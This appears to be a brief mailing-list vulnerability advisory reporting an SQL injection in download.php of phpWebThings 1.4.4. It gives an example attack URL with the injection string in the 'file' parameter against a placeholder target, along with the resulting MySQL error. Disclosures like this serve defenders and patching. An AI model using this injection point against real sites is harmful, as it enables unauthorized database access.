<<< Date Index >>>     <<< Thread Index >>>

SQL injection in phpWebThing 1.4.4



Vulnerable: phpWebThings 1.4.4
website : http://phpwebthings.org

The bug in download.php

ThE Exploit :

http://www.target.com/download.php?file=|SQL


ThE Error:

You have an error in your SQL syntax. Check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'order by date DESC' at 
line 1

AhLaM
http://www.lezr.com/vb
Best Regards ,,,